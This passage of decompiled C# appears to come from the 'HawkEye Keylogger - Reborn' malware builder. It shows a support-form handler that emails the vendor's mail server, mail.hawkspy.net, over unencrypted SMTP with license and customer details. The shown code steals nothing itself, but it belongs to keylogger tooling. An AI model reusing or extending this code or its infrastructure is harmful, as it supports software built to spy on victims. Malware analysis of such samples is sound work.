                            this.communication[0],
                            ",",
                            this.communication[4],
                            ",",
                            this.communication[5],
                            ",",
                            this.txtEmail.Text
                        });
                        mailMessage.To.Add(addresses);
                    }
                    else
                    {
                        flag = (Operators.CompareString(this.cboSubject.Text, "Sales Support", false) == 0);
                        if (flag)
                        {
                            string addresses2 = this.communication[2] + "," + this.txtEmail.Text;
                            mailMessage.To.Add(addresses2);
                        }
                        else
                        {
                            flag = (Operators.CompareString(this.cboSubject.Text, "Others", false) == 0);
                            if (flag)
                            {
                                string addresses3 = this.communication[1] + "," + this.txtEmail.Text;
                                mailMessage.To.Add(addresses3);
                            }
                        }
                    }
                    mailMessage.Subject = this.cboSubject.Text;
                    mailMessage.Subject = this.cboSubject.Text;
                    mailMessage.Body = string.Concat(new string[]
                    {
                        "Username: ",
                        LicenseGlobal.Seal.Username.ToString(),
                        "\r\nProduct: HawkEye Keylogger - Reborn\r\nLicense Type: ",
                        LicenseGlobal.Seal.LicenseType.ToString(),
                        "\r\nCustomer's Email: ",
                        this.txtEmail.Text,
                        "\r\n\r\n\r\n\r\nSubject: \r\n",
                        this.cboSubject.Text,
                        "\r\n\r\nBody: \r\n",
                        this.txtBody.Text
                    });
                    new SmtpClient("mail.hawkspy.net")
                    {
                        Port = 25,
                        DeliveryMethod = SmtpDeliveryMethod.Network,
                        UseDefaultCredentials = false,
                        Credentials = new NetworkCredential(this.communication[0], this.communication[6] + "\\${"),
                        EnableSsl = false
                    }.Send(mailMessage);
                    CustomMsgBox.Show("Success! One of our Team Member will contact you shortly.");
                    this.btnSend.Enabled = true;
                    this.btnSend.Text = "Send";
                    this.sBarLabel.Text = "Idle...";
                }
                catch (Exception expr_305)
                {
                    ProjectData.SetProjectError(expr_305);
                    Exception ex = expr_305;
                    CustomMsgBox.Show(ex.Message.ToString());
                    this.btnSend.Enabled = true;
                    this.btnSend.Text = "Send";
                    this.sBarLabel.Text = "Idle...";
                    ProjectData.ClearProjectError();
                }
            }